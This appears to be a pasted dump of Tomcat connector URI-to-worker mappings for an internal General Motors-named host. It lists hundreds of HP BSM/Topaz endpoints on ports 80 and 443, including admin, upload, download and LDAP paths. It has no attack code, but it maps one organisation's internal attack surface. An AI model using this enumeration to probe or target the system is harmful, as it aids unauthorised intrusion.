internalsubsomain.was.here.gm.com:80 /excite-runtime/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /tvb/EmailServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /bpi/EmailServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/PDFServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /SampleBrowser/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /bpi/remoteProxy Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /TopazSettings/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /tvb/remoteProxy Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/bpmappapi Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /tvb/PDFServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /tvb/registerTV Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/download Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/bsmLight Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /bpi/PDFServlet Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/gateway Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /opr-console/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/kpiapi Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/slaapi Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /bpi/download Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /tvb/download Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /freshwater/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/upload Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/*.jsp Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /ucmdb-api/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/acweb Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/*.tac Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /dashboard/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /tvb/upload Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /bpi/upload Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /webinfra/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /topaz/*.do Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /rumproxy/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /bpi/*.jsp Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /tvb/*.jsp Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /opr-web/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /uim/*.jsp Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /tvb/*.do Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /excite/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /bpi/*.do Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /opr-pm/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /qcbin/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /OVPM/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /mcrs/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /ext/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /cm/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /opr-config-server Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /opr-admin-server Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /opr-cpdiff-tool Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /excite-runtime Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /opr-console Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /opr-web Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /excite Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /opr-pm Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com:80 /*.csv Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/jsps/bpi/admin/modeler/lib/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /*/static/modelExplorer/gwt/MeTreeService Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/gdeopenapi/services/GdeWsOpenAPI Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/analytics/RealTimeChartServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/analytics/DynamicChartServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /axis2/services/DiscoveryService/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/analytics/ProcessServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/analytics/PortalsServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/personalization/project/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/analytics/AllerezServer/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/analytics/GroupServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/analytics/AdminServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /axis2/services/UcmdbService/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/analytics/KpiServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/AdminCenter/servlets/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/services/technical/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/services/business/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/analytics/servlet/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/gwt/charts/gwt-log Exact uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/omi/integration/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/slm/customers/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bam/open_api/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bsmLight/BPM/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/webtools/gwt/* Wildchar uriworkermap -1 0 0 - - - - 0
internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/rfw/xml/*.xml Wildchar uriworkermap -1 0 0 - - - - 0
  415. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/rfw/xls/*.xls Wildchar uriworkermap -1 0 0 - - - - 0
  416. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/webtools/gwt/* Wildchar uriworkermap -1 0 0 - - - - 0
  417. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/webtools/gwt/* Wildchar uriworkermap -1 0 0 - - - - 0
  418. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/rfw/xls/*.xls Wildchar uriworkermap -1 0 0 - - - - 0
  419. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/rfw/xls/*.xls Wildchar uriworkermap -1 0 0 - - - - 0
  420. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/rfw/xml/*.xml Wildchar uriworkermap -1 0 0 - - - - 0
  421. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/rfw/xml/*.xml Wildchar uriworkermap -1 0 0 - - - - 0
  422. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/eum/BPRTransactionDefinitionServlet Exact uriworkermap -1 0 0 - - - - 0
  423. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/services/EntityNotificationPort Exact uriworkermap -1 0 0 - - - - 0
  424. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/eum/DownloadScriptServlet Exact uriworkermap -1 0 0 - - - - 0
  425. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /axis2/services/DiscoveryService Exact uriworkermap -1 0 0 - - - - 0
  426. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/eum/DownloadALMZipServlet Exact uriworkermap -1 0 0 - - - - 0
  427. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/j2ee/DataCollectorServlet Exact uriworkermap -1 0 0 - - - - 0
  428. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /uim/composition_manager/*_srv* Wildchar uriworkermap -1 0 0 - - - - 0
  429. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/BacRepositoriesUI/*.rep Wildchar uriworkermap -1 0 0 - - - - 0
  430. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/personalization/project Exact uriworkermap -1 0 0 - - - - 0
  431. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/gdeopenapi/GdeOpenApi Exact uriworkermap -1 0 0 - - - - 0
  432. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /axis2/services/UcmdbService Exact uriworkermap -1 0 0 - - - - 0
  433. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/eum/TCPReportServlet Exact uriworkermap -1 0 0 - - - - 0
  434. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/SnapshotServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
  435. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/monitoring_skin/* Wildchar uriworkermap -1 0 0 - - - - 0
  436. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/dwrsitescopeodm/* Wildchar uriworkermap -1 0 0 - - - - 0
  437. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/rca/rcaFrontComp Exact uriworkermap -1 0 0 - - - - 0
  438. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bam/*.bamNoProxy Wildchar uriworkermap -1 0 0 - - - - 0
  439. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/eumreportsapi/* Wildchar uriworkermap -1 0 0 - - - - 0
  440. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/servicehealth/* Wildchar uriworkermap -1 0 0 - - - - 0
  441. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/messagebroker/* Wildchar uriworkermap -1 0 0 - - - - 0
  442. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/omi/integration Exact uriworkermap -1 0 0 - - - - 0
  443. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bpr/BPRServlet Exact uriworkermap -1 0 0 - - - - 0
  444. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bam/BAMOpenApi Exact uriworkermap -1 0 0 - - - - 0
  445. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/slm/customers Exact uriworkermap -1 0 0 - - - - 0
  446. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bsmservices/* Wildchar uriworkermap -1 0 0 - - - - 0
  447. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/diagnostics/* Wildchar uriworkermap -1 0 0 - - - - 0
  448. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/ldapContext/* Wildchar uriworkermap -1 0 0 - - - - 0
  449. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/messagebroker/* Wildchar uriworkermap -1 0 0 - - - - 0
  450. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/messagebroker/* Wildchar uriworkermap -1 0 0 - - - - 0
  451. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/monitoring/* Wildchar uriworkermap -1 0 0 - - - - 0
  452. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bsmLight/BPM Exact uriworkermap -1 0 0 - - - - 0
  453. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/eumopenapi/* Wildchar uriworkermap -1 0 0 - - - - 0
  454. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/dwrrunbook/* Wildchar uriworkermap -1 0 0 - - - - 0
  455. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bpmappapi/* Wildchar uriworkermap -1 0 0 - - - - 0
  456. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/sitescope/* Wildchar uriworkermap -1 0 0 - - - - 0
  457. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/eumappapi/* Wildchar uriworkermap -1 0 0 - - - - 0
  458. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/dashboard/* Wildchar uriworkermap -1 0 0 - - - - 0
  459. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /mercury/dynamic/* Wildchar uriworkermap -1 0 0 - - - - 0
  460. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/topaz_api/* Wildchar uriworkermap -1 0 0 - - - - 0
  461. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bsmLight/* Wildchar uriworkermap -1 0 0 - - - - 0
  462. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bam/*.bam Wildchar uriworkermap -1 0 0 - - - - 0
  463. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/tdm/*.tdm Wildchar uriworkermap -1 0 0 - - - - 0
  464. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opal/uibridge/* Wildchar uriworkermap -1 0 0 - - - - 0
  465. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/dwr-pi/* Wildchar uriworkermap -1 0 0 - - - - 0
  466. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/siebel/* Wildchar uriworkermap -1 0 0 - - - - 0
  467. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/appmon/* Wildchar uriworkermap -1 0 0 - - - - 0
  468. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/acweb/* Wildchar uriworkermap -1 0 0 - - - - 0
  469. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opal/admin/* Wildchar uriworkermap -1 0 0 - - - - 0
  470. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/TMS/* Wildchar uriworkermap -1 0 0 - - - - 0
  471. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/dwr/* Wildchar uriworkermap -1 0 0 - - - - 0
  472. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/rest/* Wildchar uriworkermap -1 0 0 - - - - 0
  473. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opal/app/* Wildchar uriworkermap -1 0 0 - - - - 0
  474. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/SLMGraphCallBackServletVer_41 Exact uriworkermap -1 0 0 - - - - 0
  475. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/SymphonyRedirectionServlet Exact uriworkermap -1 0 0 - - - - 0
  476. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/OnlineDiagnosticServlet Exact uriworkermap -1 0 0 - - - - 0
  477. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/SLMGraphCallBackServlet Exact uriworkermap -1 0 0 - - - - 0
  478. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/authorizationmanagment Exact uriworkermap -1 0 0 - - - - 0
  479. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/ColorsRetrieverServlet Exact uriworkermap -1 0 0 - - - - 0
  480. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/OfflineReportsServlet Exact uriworkermap -1 0 0 - - - - 0
  481. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/ConfigurationServlet Exact uriworkermap -1 0 0 - - - - 0
  482. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/kpiQueryServiceProxy Exact uriworkermap -1 0 0 - - - - 0
  483. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/VTContextMenuServlet Exact uriworkermap -1 0 0 - - - - 0
  484. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/authorizationcontrol Exact uriworkermap -1 0 0 - - - - 0
  485. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/PrismHandlerServlet Exact uriworkermap -1 0 0 - - - - 0
  486. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/OfflineReportsServlet Exact uriworkermap -1 0 0 - - - - 0
  487. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/OfflineReportsServlet Exact uriworkermap -1 0 0 - - - - 0
  488. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/JapaneseHelpServlet Exact uriworkermap -1 0 0 - - - - 0
  489. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /filters/CategoriesServlet Exact uriworkermap -1 0 0 - - - - 0
  490. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/VisualFlowMapServlet Exact uriworkermap -1 0 0 - - - - 0
  491. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/SLMCallbackServlet Exact uriworkermap -1 0 0 - - - - 0
  492. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/ContextMenuServlet Exact uriworkermap -1 0 0 - - - - 0
  493. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/businessimpactapi Exact uriworkermap -1 0 0 - - - - 0
  494. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/JavaScriptServlet Exact uriworkermap -1 0 0 - - - - 0
  495. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /filters/FiltersServlet Exact uriworkermap -1 0 0 - - - - 0
  496. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/CMSImagesServlet Exact uriworkermap -1 0 0 - - - - 0
  497. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/TopazSiteServlet Exact uriworkermap -1 0 0 - - - - 0
  498. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/ContextMenuServlet Exact uriworkermap -1 0 0 - - - - 0
  499. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/FrameworkServlet Exact uriworkermap -1 0 0 - - - - 0
  500. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/ContextMenuServlet Exact uriworkermap -1 0 0 - - - - 0
  501. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/TopazSwitchboard Exact uriworkermap -1 0 0 - - - - 0
  502. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/LazyTreeServlet Exact uriworkermap -1 0 0 - - - - 0
  503. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/CallbackServlet Exact uriworkermap -1 0 0 - - - - 0
  504. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/SlmSiteServlet Exact uriworkermap -1 0 0 - - - - 0
  505. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/LegendsServlet Exact uriworkermap -1 0 0 - - - - 0
  506. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/TopazSiteServlet Exact uriworkermap -1 0 0 - - - - 0
  507. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/FrameworkServlet Exact uriworkermap -1 0 0 - - - - 0
  508. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/FrameworkServlet Exact uriworkermap -1 0 0 - - - - 0
  509. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/isolateProblem Exact uriworkermap -1 0 0 - - - - 0
  510. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/TopazSiteServlet Exact uriworkermap -1 0 0 - - - - 0
  511. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/LazyTreeServlet Exact uriworkermap -1 0 0 - - - - 0
  512. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-config-server/* Wildchar uriworkermap -1 0 0 - - - - 0
  513. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/LazyTreeServlet Exact uriworkermap -1 0 0 - - - - 0
  514. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/servicehealth Exact uriworkermap -1 0 0 - - - - 0
  515. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/FlowMapServlet Exact uriworkermap -1 0 0 - - - - 0
  516. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /utility_portlets/* Wildchar uriworkermap -1 0 0 - - - - 0
  517. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-admin-server/* Wildchar uriworkermap -1 0 0 - - - - 0
  518. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/EmailServlet Exact uriworkermap -1 0 0 - - - - 0
  519. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /freshwater_skin/* Wildchar uriworkermap -1 0 0 - - - - 0
  520. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/remoteProxy Exact uriworkermap -1 0 0 - - - - 0
  521. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-cpdiff-tool/* Wildchar uriworkermap -1 0 0 - - - - 0
  522. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bsmservices Exact uriworkermap -1 0 0 - - - - 0
  523. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/ldapContext Exact uriworkermap -1 0 0 - - - - 0
  524. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /mam-collectors/* Wildchar uriworkermap -1 0 0 - - - - 0
  525. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /excite-runtime/* Wildchar uriworkermap -1 0 0 - - - - 0
  526. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/EmailServlet Exact uriworkermap -1 0 0 - - - - 0
  527. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/EmailServlet Exact uriworkermap -1 0 0 - - - - 0
  528. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/PDFServlet Exact uriworkermap -1 0 0 - - - - 0
  529. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /SampleBrowser/* Wildchar uriworkermap -1 0 0 - - - - 0
  530. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/remoteProxy Exact uriworkermap -1 0 0 - - - - 0
  531. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /TopazSettings/* Wildchar uriworkermap -1 0 0 - - - - 0
  532. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/remoteProxy Exact uriworkermap -1 0 0 - - - - 0
  533. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bpmappapi Exact uriworkermap -1 0 0 - - - - 0
  534. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/PDFServlet Exact uriworkermap -1 0 0 - - - - 0
  535. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/registerTV Exact uriworkermap -1 0 0 - - - - 0
  536. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/download Exact uriworkermap -1 0 0 - - - - 0
  537. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bsmLight Exact uriworkermap -1 0 0 - - - - 0
  538. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/PDFServlet Exact uriworkermap -1 0 0 - - - - 0
  539. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/gateway Exact uriworkermap -1 0 0 - - - - 0
  540. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-console/* Wildchar uriworkermap -1 0 0 - - - - 0
  541. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/kpiapi Exact uriworkermap -1 0 0 - - - - 0
  542. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/slaapi Exact uriworkermap -1 0 0 - - - - 0
  543. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/download Exact uriworkermap -1 0 0 - - - - 0
  544. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/download Exact uriworkermap -1 0 0 - - - - 0
  545. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /freshwater/* Wildchar uriworkermap -1 0 0 - - - - 0
  546. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/upload Exact uriworkermap -1 0 0 - - - - 0
  547. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/*.jsp Wildchar uriworkermap -1 0 0 - - - - 0
  548. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /ucmdb-api/* Wildchar uriworkermap -1 0 0 - - - - 0
  549. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/acweb Exact uriworkermap -1 0 0 - - - - 0
  550. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/*.tac Wildchar uriworkermap -1 0 0 - - - - 0
